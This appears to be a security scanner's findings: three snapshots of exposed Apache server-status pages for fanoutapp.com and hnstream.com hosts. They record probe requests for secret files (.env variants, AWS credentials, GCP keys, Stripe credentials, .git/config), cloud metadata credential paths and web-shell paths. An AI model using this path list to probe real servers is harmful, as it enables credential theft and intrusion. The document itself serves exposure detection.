127.0.0.1http/1.1api.hnstream.com:8000GET /.env.docker.dev HTTP/1.1 0-36-0/0/1144. 0.00505212415109940.00.004.01 127.0.0.1http/1.1api.hnstream.com:8000GET /.env.prod.local HTTP/1.1 0-36-0/0/1162. 0.0050521226987960.00.003.57 127.0.0.1http/1.1api.hnstream.com:8000GET /.htaccess HTTP/1.1 0-36-0/0/1154. 0.00505212227102960.00.004.15 127.0.0.1http/1.1api.hnstream.com:8000GET /hosting.json HTTP/1.1 0-36-0/0/1159. 0.00505212215118480.00.003.64 127.0.0.1http/1.1api.hnstream.com:8000GET /application/config/migration.php HTTP/1.1 0-36-0/0/1133. 0.0050521227093410.00.003.31 127.0.0.1http/1.1api.hnstream.com:8000GET /config/module.config.php HTTP/1.1 0-36-0/0/1129. 0.0050521228788710.00.003.21 127.0.0.1http/1.1api.hnstream.com:8000GET /appsettings.Staging.json HTTP/1.1 0-36-0/0/1144. 0.00505212395120960.00.003.35 127.0.0.1http/1.1api.hnstream.com:8000GET /.aws/config HTTP/1.1 0-36-0/0/1137. 0.0050521249091120.00.003.65 127.0.0.1http/1.1api.hnstream.com:8000GET /root/.aws/credentials HTTP/1.1 0-36-0/0/1148. 0.00505212504101800.00.003.64 127.0.0.1http/1.1api.hnstream.com:8000GET /.env.bak HTTP/1.1 0-36-0/0/1150. 0.0050521239095710.00.003.03 127.0.0.1http/1.1api.hnstream.com:8000GET /phpinfo HTTP/1.1 0-36-0/0/1135. 0.00505212301116260.00.003.25 127.0.0.1http/1.1api.hnstream.com:8000GET /home/*/.aws/credentials HTTP/1.1 0-36-0/0/1136. 0.00505212508111570.00.003.12 127.0.0.1http/1.1api.hnstream.com:8000GET /infophp.php HTTP/1.1 0-36-0/0/1140. 0.00505212281103830.00.003.10 127.0.0.1http/1.1api.hnstream.com:8000GET /metrics HTTP/1.1 0-36-0/0/1142. 0.00505212518108920.00.003.33 127.0.0.1http/1.1api.hnstream.com:8000GET /.env.dev HTTP/1.1 0-36-0/0/1143. 0.00505212173114650.00.003.38 127.0.0.1http/1.1api.hnstream.com:8000GET /local/.env HTTP/1.1 0-36-0/0/1120. 0.0050521242997460.00.003.17 127.0.0.1http/1.1api.hnstream.com:8000GET /temp.php HTTP/1.1 0-36-0/0/1164. 0.00505212483112750.00.003.57 127.0.0.1http/1.1api.hnstream.com:8000GET /config.js HTTP/1.1 1-36-0/0/1297. 0.00505213284170510.00.003.60 127.0.0.1http/1.1api.hnstream.com:8000GET /.env~ HTTP/1.1 1-36-0/0/1296. 0.00505213223120810.00.003.81 127.0.0.1http/1.1api.hnstream.com:8000GET /application/config/routes.php HTTP/1.1 1-36-0/0/1274. 0.00505213232136080.00.003.36 127.0.0.1http/1.1api.hnstream.com:8000GET /.env.save HTTP/1.1 1-36-0/0/1321. 0.00505213137125420.00.003.88 127.0.0.1http/1.1api.hnstream.com:8000GET /.env.stage HTTP/1.1 1-36-0/0/1269. 0.00505213570132070.00.003.36 127.0.0.1http/1.1api.hnstream.com:8000GET /config/aws.yml HTTP/1.1 1-36-0/0/1311. 0.00505213519129590.00.003.80 127.0.0.1http/1.1api.hnstream.com:8000GET /.DS_Store HTTP/1.1 1-36-0/0/1316. 0.00505213490107540.00.003.89 127.0.0.1http/1.1api.hnstream.com:8000GET /.vscode/settings.json HTTP/1.1 1-36-0/0/1300. 0.00505213539100050.00.003.42 127.0.0.1http/1.1api.hnstream.com:8000GET /.ssh/sftp-config.json HTTP/1.1 1-36-0/0/1297. 0.00505213522122410.00.003.76 127.0.0.1http/1.1api.hnstream.com:8000GET /.env.production HTTP/1.1 1-36-0/0/1287. 0.0050521314799590.00.003.57 127.0.0.1http/1.1api.hnstream.com:8000GET /config/services.php HTTP/1.1 1-36-0/0/1307. 0.00505213468117510.00.003.76 127.0.0.1http/1.1api.hnstream.com:8000GET /.idea/ HTTP/1.1 1-36-0/0/1277. 0.00505213500106370.00.003.37 127.0.0.1http/1.1api.hnstream.com:8000GET /.phpinfo HTTP/1.1 1-36-0/0/1269. 0.0050521351397480.00.003.53 127.0.0.1http/1.1api.hnstream.com:8000GET /stripe_credentials.json HTTP/1.1 1-36-0/0/1286. 0.00505213521119110.00.004.12 127.0.0.1http/1.1api.hnstream.com:8000GET /latest/meta-data/iam/security-credentials/ HTTP/1.1 1-36-0/0/1292. 0.00505213511123570.00.003.52 127.0.0.1http/1.1api.hnstream.com:8000GET /latest/user-data HTTP/1.1 1-36-0/0/1284. 0.00505213571113060.00.003.82 127.0.0.1http/1.1api.hnstream.com:8000GET /.env.prod HTTP/1.1 1-36-0/0/1300. 0.00505213127103220.00.003.78 127.0.0.1http/1.1api.hnstream.com:8000GET /.env.local HTTP/1.1 1-36-0/0/1274. 0.00505213558121170.00.003.66 127.0.0.1http/1.1api.hnstream.com:8000GET /.zshrc HTTP/1.1 1-36-0/0/1269. 0.0050521354795580.00.003.79 127.0.0.1http/1.1api.hnstream.com:8000GET /.wp-config.php.swp HTTP/1.1 1-36-0/0/1311. 0.00505213161110960.00.003.66 127.0.0.1http/1.1api.hnstream.com:8000GET /application/config/encryption.php HTTP/1.1 1-36-0/0/1288. 0.00505213507114830.00.003.60 127.0.0.1http/1.1api.hnstream.com:8000GET /gcp-key.json HTTP/1.1 1-36-0/0/1288. 0.00505213227104120.00.003.62 127.0.0.1http/1.1api.hnstream.com:8000GET /.env.resend HTTP/1.1 1-36-0/0/1280. 0.00505213166105930.00.003.53 127.0.0.1http/1.1api.hnstream.com:8000GET /.env.mailgun HTTP/1.1 1-36-0/0/1306. 0.00505213160103710.00.003.79 127.0.0.1http/1.1api.hnstream.com:8000GET /.envrc HTTP/1.1 1-36-0/0/1247. 0.0050521360711629
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb312c28dabf2c28dabf6f6cf846
Apache Status Apache Server Status for todo-api.fanoutapp.com (via 127.0.0.1) Server Version: Apache/2.4.41 (Ubuntu) mod_wsgi/4.6.8 Python/2.7 Server MPM: event Server Built: 2025-04-02T18:34:29 Current Time: Saturday, 27-Dec-2025 06:40:33 UTC Restart Time: Friday, 21-Nov-2025 21:54:35 UTC Parent Server Config. Generation: 37 Parent Server MPM Generation: 36 Server uptime: 35 days 8 hours 45 minutes 58 seconds Server load: 0.05 0.11 0.11 Total accesses: 77751 - Total Traffic: 221.0 MB - Total Duration: 661596 CPU Usage: u61.6 s94.17 cu1003.5 cs294.39 - .0476% CPU load .0254 requests/sec - 75 B/second - 2981 B/request - 8.50916 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 01018361no0yes025000 11018360no1yes124000 Sum201 149000 ________________________________W_________________.............. ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-3610183610/38/1126_ 0.5011261139590.00.043.22 162.142.125.120http/1.1api.hnstream.com:8000GET / HTTP/1.1 0-3610183610/38/1092_ 0.481130386160.00.043.50 127.0.0.1http/1.1api.hnstream.com:8000GET /plugins/pwnd/as.php HTTP/1.1 0-3610183610/40/1108_ 0.4811260107970.00.052.73 162.142.125.120http/1.1 0-3610183610/38/1087_ 0.481130488770.00.053.03 127.0.0.1http/1.1api.hnstream.com:8000GET /plugins/revslider/includes/external/page/index.php HTTP/1. 0-3610183610/37/1105_ 0.481474091880.00.053.47 127.0.0.1http/1.1hnstream.com:8000GET /about.php HTTP/1.1 0-3610183610/38/1091_ 0.5011351076600.00.043.35 162.142.125.120http/1.1api.hnstream.com:8000GET / HTTP/1.1 0-3610183610/39/1128_ 0.492939078030.00.053.41 127.0.0.1http/1.1hnstream.com:8000GET /alfashell.php HTTP/1.1 0-3610183610/42/1115_ 0.501122086460.00.053.29 162.142.125.120http/1.1api.hnstream.com:8000\x16\x03\x01 0-3610183610/41/1108_ 0.502943496360.00.053.86 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /sendgrid.env HTTP/1.1 0-3610183610/41/1122_ 0.492941076620.00.053.42 127.0.0.1http/1.1hnstream.com:8000GET /.well-known/alfacgiapi/getdir.alfa HTTP/1.1 0-3610183610/41/1118_ 0.492940091410.00.134.00 127.0.0.1http/1.1hnstream.com:8000GET /wp-content/themes/twentytwentyfour/ HTTP/1.1 0-3610183610/39/1127_ 0.4929400107010.00.053.58 127.0.0.1http/1.1hnstream.com:8000GET /alfa.php HTTP/1.1 0-3610183610/39/1101_ 0.492940082710.00.053.17 127.0.0.1http/1.1hnstream.com:8000GET /wp-content/themes/vx.php HTTP/1.1 0-3610183610/36/1096_ 0.49289077730.00.043.14 127.0.0.1http/1.1hnstream.com:8000GET /wp-includes/assets/admin.php HTTP/1.1 0-3610183610/41/1107_ 0.4929400106150.00.053.28 127.0.0.1http/1.1hnstream.com:8000GET /alfa-rex.php HTTP/1.1 0-3610183610/39/1099_ 0.492939076430.00.123.57 127.0.0.1http/1.1hnstream.com:8000GET /tiny.php HTTP/1.1 0-3610183610/36/1115_ 0.482934087250.00.053.59 127.0.0.1http/1.1hnstream.com:8000GET /wp-admin/css/colors/ HTTP/1.1 0-3610183610/37/1117_ 0.4922346982920.00.052.97 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /robots.txt HTTP/1.1 0-3610183610/39/1104_ 0.4822290103840.00.053.19 127.0.0.1http/1.1hnstream.com:8000GET /fx.php HTTP/1.1 0-3610183610/39/1100_ 0.4920151895620.00.053.04 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 0-3610183610/36/1107_ 0.482010093240.00.053.03 127.0.0.1http/1.1hnstream.com:8000GET /c.php HTTP/1.1 0-3610183610/39/1107_ 0.481544096910.00.053.27 127.0.0.1http/1.1hnstream.com:8000GET /wp-content/admin.php HTTP/1.1 0-3610183610/40/1108_ 0.49154921107010.00.123.32 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET / HTTP/1.1 0-3610183610/40/1087_ 0.4914791183480.00.053.11 127.0.0.1http/1.1editor.fanoutapp.com:8000GET / HTTP/1.1 0-3610183610/39/1130_ 0.491115097430.00.053.50 127.0.0.1http/1.1hnstream.com:8000GET /bolt.php HTTP/1.1 1-3610183600/30/1262_ 0.42193159330.00.043.52 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /swagger/index.html HTTP/1.1 1-3610183600/30/1263_ 0.43183109570.00.113.74 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /swagger/swagger-ui.html HTTP/1.1 1-3610183600/33/1238_ 0.4373125300.00.053.21 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /version HTTP/1.1 1-3610183600/32/1290_ 0.4333115430.00.043.82 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /about HTTP/1.1 1-3610183600/32/1235_ 0.4333113970.00.043.29 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /debug/default/view?panel=config HTTP/1.1 1-3610183600/34/1278_ 0.4323115110.00.053.74 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /v2/_catalog HTTP/1.1 1-3610183600/33/1280_ 0.430392390.00.053.82 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-36101836026/32/1267W 0.420087800.00.043.34 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /server-status HTTP/1.1 1-3610183600/34/1261_ 0.42223109240.00.053.69 127.0.0.1http/1.1todo-api.fanoutapp.com:8000POST /graphql HTTP/1.1 1-3610183600/29/1257_ 0.4221390930.00.043.51 127.0.0.1http/1.1todo-api.fanoutapp.com:8000POST /api HTTP/1.1 1-3610183600/32/1271_ 0.42213103170.00.053.64 127.0.0.1http/1.1todo-api.fanoutapp.com:8000POST /api/graphql HTTP/1.1 1-3610183600/32/1245_ 0.4221391740.00.053.30 127.0.0.1http/1.1todo-api.fanoutapp.com:8000POST /graphql/api HTTP/1.1 1-3610183600/32/1235_ 0.4221483990.00.043.46 127.0.0.1http/1.1todo-api.fanoutapp.com:8000POST /api/gql HTTP/1.1 1-3610183600/32/1248_ 0.42203103650.00.044.04 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /swagger-ui.html HTTP/1.1 1-3610183600/33/1257_ 0.43173109560.00.043.45 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /webjars/swagger-ui/index.html HTTP/1.1 1-3610183600/30/1251_ 0.4316399470.00.043.74 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /swagger.json HTTP/1.1 1-3610183600/32/1267_ 0.4315393610.00.043.63 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /swagger/v1/swagger.json HTTP/1.1 1-3610183600/31/1241_ 0.43143106090.00.043.43 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /v2/api-docs HTTP/1.1 1-3610183600/30/1237_ 0.4313382500.00.033.65 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /v3/api-docs HTTP/1.1 1-3610183600/32/1277_ 0.43123103320.00.113.52 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /api-docs/swagger.json HTTP/1.1 1-3610183600/30/1251_ 0.43113100020.00.103.52 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /api/swagger.json HTTP/1.1 1-3610183600/33/1252_ 0.439393270.00.123.54 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /@vite/env HTTP/1.1 1-3610183600/31/1244_ 0.439394810.00.113.40 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /actuator/env HTTP/1.1 1-3610183600/32/1276_ 0.438293270.00.043.73 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /server HTTP/1.1
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb312c28dabf2c28dabfb606bb39
Apache Status Apache Server Status for todo-api.fanoutapp.com (via 127.0.0.1) Server Version: Apache/2.4.41 (Ubuntu) mod_wsgi/4.6.8 Python/2.7 Server MPM: event Server Built: 2025-04-02T18:34:29 Current Time: Wednesday, 24-Dec-2025 18:44:43 UTC Restart Time: Friday, 21-Nov-2025 21:54:35 UTC Parent Server Config. Generation: 34 Parent Server MPM Generation: 33 Server uptime: 32 days 20 hours 50 minutes 8 seconds Server load: 0.15 0.13 0.11 Total accesses: 71587 - Total Traffic: 207.2 MB - Total Duration: 624108 CPU Usage: u58.19 s88.43 cu926.11 cs269.09 - .0473% CPU load .0252 requests/sec - 76 B/second - 3034 B/request - 8.71817 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 0749451no0yes025000 1749450no1yes124000 Sum201 149000 ______________________________W___________________.............. ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-337494510/28/1002_ 0.7710472132310.00.062.99 104.156.83.140http/1.1api.livecounter.org:8000GET /_next/data HTTP/1.1 0-337494510/25/963_ 0.731974875890.00.053.21 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /server HTTP/1.1 0-337494510/27/974_ 0.7319764100500.00.052.49 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /actuator/env HTTP/1.1 0-337494510/28/959_ 0.761179182340.00.072.70 127.0.0.1http/1.1hnstream.com:8000GET / HTTP/1.1 0-337494510/27/983_ 0.7619313885390.00.053.18 157.52.117.44http/1.1api.livecounter.org:8000GET / HTTP/1.1 0-337494510/27/970_ 0.722537471240.00.053.05 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /v2/api-docs HTTP/1.1 0-337494510/31/996_ 0.731969771180.00.073.02 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /about HTTP/1.1 0-337494510/24/984_ 0.731926475430.00.063.06 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-337494510/30/975_ 0.761978585370.00.073.55 157.52.117.42http/1.1api.hnstream.com:8000GET /favicon.ico HTTP/1.1 0-337494510/31/994_ 0.7519813769710.00.073.18 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET / HTTP/1.1 0-337494510/27/993_ 0.7525423486390.00.063.62 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /.env HTTP/1.1 0-337494510/26/998_ 0.731973495790.00.063.35 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /.vscode/sftp.json HTTP/1.1 0-337494510/28/974_ 0.761979469280.00.052.95 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /favicon.ico HTTP/1.1 0-337494510/30/977_ 0.761981172370.00.072.86 127.0.0.1http/1.1hnstream.com:8000GET / HTTP/1.1 0-337494510/30/977_ 0.732640492870.00.082.97 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /debug/default/view?panel=config HTTP/1.1 0-337494510/29/970_ 0.752627766190.00.133.17 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /info.php HTTP/1.1 0-337494510/29/992_ 0.752626779740.00.063.29 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /?rest_route=/wp/v2/users/ HTTP/1.1 0-337494510/32/988_ 0.771048276820.00.082.77 167.82.233.48http/1.1api.livecounter.org:8000GET /api/action HTTP/1.1 0-337494510/24/979_ 0.751043797890.00.062.98 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /.env HTTP/1.1 0-337494510/27/970_ 0.741174789920.00.062.72 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /login.action HTTP/1.1 0-337494510/31/978_ 0.752628385590.00.082.79 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /telescope/requests HTTP/1.1 0-337494510/28/977_ 0.752629690620.00.052.87 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /config.json HTTP/1.1 0-337494510/27/973_ 0.752630495160.00.062.89 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /s/1393e21363e2130313e2135313/_/;/META-INF/maven/com.atlass 0-337494510/29/953_ 0.722621871330.00.062.80 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /swagger.json HTTP/1.1 0-337494510/27/999_ 0.751042491750.00.063.20 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /.git/config HTTP/1.1 1-337494500/31/1144_ 0.92153151270.00.063.32 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /swagger/v1/swagger.json HTTP/1.1 1-337494500/32/1147_ 0.9253105350.00.073.33 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /.vscode/sftp.json HTTP/1.1 1-337494500/26/1119_ 0.9273115240.00.133.00 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /version HTTP/1.1 1-337494500/35/1168_ 0.9413111120.00.153.55 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /v2/_catalog HTTP/1.1 1-337494500/26/1120_ 0.92213108700.00.073.10 127.0.0.1http/1.1todo-api.fanoutapp.com:8000POST /graphql/api HTTP/1.1 1-3374945026/35/1159W 0.9200108920.00.083.55 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /server-status HTTP/1.1 1-337494500/30/1157_ 0.9216380990.00.073.52 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /swagger.json HTTP/1.1 1-337494500/33/1145_ 0.9219382610.00.093.13 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /swagger/index.html HTTP/1.1 1-337494500/37/1141_ 0.9216397580.00.313.48 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /webjars/swagger-ui/index.html HTTP/1.1 1-337494500/30/1145_ 0.929382150.00.143.09 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /actuator/env HTTP/1.1 1-337494500/30/1150_ 0.9221398740.00.073.43 127.0.0.1http/1.1todo-api.fanoutapp.com:8000POST /api/graphql HTTP/1.1 1-337494500/28/1130_ 0.9218381500.00.103.03 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /swagger/swagger-ui.html HTTP/1.1 1-337494500/31/1119_ 0.9221377140.00.063.19 127.0.0.1http/1.1todo-api.fanoutapp.com:8000POST /api/gql HTTP/1.1 1-337494500/32/1135_ 0.922394770.00.203.77 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /debug/default/view?panel=config HTTP/1.1 1-337494500/31/1135_ 0.940399230.00.143.20 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-337494500/30/1134_ 0.9221494540.00.073.54 127.0.0.1http/1.1todo-api.fanoutapp.com:8000POST /graphql HTTP/1.1 1-337494500/29/1147_ 0.9219386670.00.183.43 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /swagger-ui.html HTTP/1.1 1-337494500/26/1122_ 0.92143102170.00.143.16 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /v2/api-docs HTTP/1.1 1-337494500/31/1118_ 0.9221378650.00.153.30 127.0.0.1http/1.1todo-api.fanoutapp.com:8000POST /api HTTP/1.1 1-337494500/32/1156_ 0.9213396770.00.083.15 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /v3/api-docs HTTP/1.1 1-337494500/30/1136_ 0.9211395650.00.153.25 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /api-docs/swagger.json HTTP/1.1 1-337494500/34/1136_ 0.923383180.00.073.25 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /about HTTP/1.1 1-337494500/29/1122_ 0.929391460.00.063.13 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /@vite/env HTTP/1.1 1-337494500/27/1155_ 0.928389820.00.073.52 127.0.0.1http/1.1todo-ap
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb312c28dabf2c28dabfbef0efc8
Apache Status Apache Server Status for todo-api.fanoutapp.com (via 127.0.0.1) Server Version: Apache/2.4.41 (Ubuntu) mod_wsgi/4.6.8 Python/2.7 Server MPM: event Server Built: 2025-04-02T18:34:29 Current Time: Monday, 22-Dec-2025 21:07:22 UTC Restart Time: Friday, 21-Nov-2025 21:54:35 UTC Parent Server Config. Generation: 32 Parent Server MPM Generation: 31 Server uptime: 30 days 23 hours 12 minutes 47 seconds Server load: 0.10 0.16 0.17 Total accesses: 67474 - Total Traffic: 195.7 MB - Total Duration: 584702 CPU Usage: u55.27 s83.26 cu872.09 cs252.9 - .0472% CPU load .0252 requests/sec - 76 B/second - 3041 B/request - 8.66559 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 0570323no0yes025000 1570322no1yes124010 Sum201 149010 _________________________________W________________.............. ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-315703230/18/936_ 0.5562240120290.00.052.86 127.0.0.1http/1.1hnstream.com:8000GET /robots.txt HTTP/1.1 0-315703230/17/901_ 0.5722683670620.00.043.09 127.0.0.1http/1.1chat.fanoutapp.com:8000GET / HTTP/1.1 0-315703230/15/911_ 0.522263897760.00.032.36 157.52.100.33http/1.1api.hnstream.com:8000GET /.env.example HTTP/1.1 0-315703230/21/890_ 0.572091177240.00.062.49 127.0.0.1http/1.1hnstream.com:8000GET / HTTP/1.1 0-315703230/14/919_ 0.552086482430.00.033.06 23.235.43.38http/1.1api.hnstream.com:8000HEAD /api/action HTTP/1.1 0-315703230/18/907_ 0.571113767310.00.182.93 127.0.0.1http/1.1api.hnstream.com:8000GET /login.html HTTP/1.1 0-315703230/18/927_ 0.55106463380.00.032.79 23.235.43.26http/1.1api.hnstream.com:8000HEAD /_next/data HTTP/1.1 0-315703230/14/925_ 0.536492372340.00.032.94 23.235.43.26http/1.1 0-315703230/19/914_ 0.556490179970.00.183.36 23.235.43.28http/1.1api.hnstream.com:8000POST / HTTP/1.1 0-315703230/15/923_ 0.536488362200.00.033.04 127.0.0.1http/1.1todo-api.fanoutapp.com:8000POST / HTTP/1.1 0-315703230/17/930_ 0.506485382120.00.103.50 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET / HTTP/1.1 0-315703230/16/937_ 0.5162161983390.00.033.23 140.248.77.173http/1.1api.livecounter.org:8000POST /counters/1/ HTTP/1.1 0-315703230/14/909_ 0.446197264820.00.102.82 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /?rest_route=/wp/v2/users/ HTTP/1.1 0-315703230/15/909_ 0.556197066270.00.112.70 127.0.0.1http/1.1hnstream.com:8000GET / HTTP/1.1 0-315703230/18/913_ 0.516192378820.00.032.75 140.248.74.74http/1.1api.hnstream.com:8000GET / HTTP/1.1 0-315703230/18/901_ 0.554178160750.00.032.97 198.235.24.149http/1.1 0-315703230/18/931_ 0.556221075620.00.113.18 127.0.0.1http/1.1hnstream.com:8000GET / HTTP/1.1 0-315703230/13/920_ 0.5657953572400.00.032.63 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /.env HTTP/1.1 0-315703230/15/918_ 0.545790090480.00.032.78 127.0.0.1http/1.1hnstream.com:8000HEAD /apps HTTP/1.1 0-315703230/17/908_ 0.545777086620.00.142.53 127.0.0.1http/1.1hnstream.com:8000HEAD /api/action HTTP/1.1 0-315703230/15/912_ 0.5641782281110.00.032.65 198.235.24.149http/1.1api.hnstream.com:8000GET / HTTP/1.1 0-315703230/18/912_ 0.525365183170.00.042.69 127.0.0.1http/1.1hnstream.com:8000GET / HTTP/1.1 0-315703230/14/912_ 0.565776283600.00.032.75 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 0-315703230/16/884_ 0.565365167020.00.032.67 35.203.210.92http/1.1api.hnstream.com:8000\x16\x03\x01 0-315703230/20/937_ 0.545771087750.00.143.07 127.0.0.1http/1.1hnstream.com:8000HEAD /_next/data HTTP/1.1 1-315703220/26/1048_ 0.9594139870.00.063.04 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /actuator/env HTTP/1.1 1-315703220/26/1044_ 0.958492680.00.283.11 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /server HTTP/1.1 1-315703220/26/1023_ 0.9563107150.00.072.64 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /.vscode/sftp.json HTTP/1.1 1-315703220/25/1061_ 0.9573100540.00.083.16 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /version HTTP/1.1 1-315703220/26/1023_ 0.9623102790.00.182.88 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /v2/_catalog HTTP/1.1 1-315703220/24/1057_ 0.9543100340.00.083.31 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /about HTTP/1.1 1-315703220/24/1058_ 0.961368850.00.253.27 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-315703220/28/1041_ 0.953374790.00.112.88 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /debug/default/view?panel=config HTTP/1.1 1-3157032226/21/1036W 0.930089290.00.142.95 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /server-status HTTP/1.1 1-315703220/28/1040_ 0.9322572670.00.062.78 127.0.0.1http/1.1todo-api.fanoutapp.com:8000POST /graphql HTTP/1.1 1-315703220/25/1052_ 0.9322392710.00.063.20 127.0.0.1http/1.1todo-api.fanoutapp.com:8000POST /api HTTP/1.1 1-315703220/24/1033_ 0.9322374840.00.102.77 127.0.0.1http/1.1todo-api.fanoutapp.com:8000POST /api/graphql HTTP/1.1 1-315703220/24/1024_ 0.9321371820.00.072.99 127.0.0.1http/1.1todo-api.fanoutapp.com:8000POST /graphql/api HTTP/1.1 1-315703220/29/1030_ 0.9321385130.00.143.41 127.0.0.1http/1.1todo-api.fanoutapp.com:8000POST /api/gql HTTP/1.1 1-315703220/21/1042_ 0.9320387390.00.042.92 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /swagger-ui.html HTTP/1.1 1-315703220/27/1027_ 0.9319383720.00.223.31 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /swagger/index.html HTTP/1.1 1-315703220/23/1050_ 0.9318381190.00.053.09 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /swagger/swagger-ui.html HTTP/1.1 1-315703220/23/1027_ 0.9417390940.00.082.87 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /webjars/swagger-ui/index.html HTTP/1.1 1-315703220/25/1017_ 0.9516369990.00.142.98 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /swagger.json HTTP/1.1 1-315703220/26/1056_ 0.9515387450.00.062.85 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /swagger/v1/swagger.json HTTP/1.1 1-315703220/23/1038_ 0.9514387460.00.092.87 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /v2/api-docs HTTP/1.1 1-315703220/25/1029_ 0.9512366160.00.072.98 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /api-docs/swagger.json HTTP/1.1 1-315703220/24/1025_ 0.9513384320.00.082.83 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /v3/api-docs HTTP/1.1 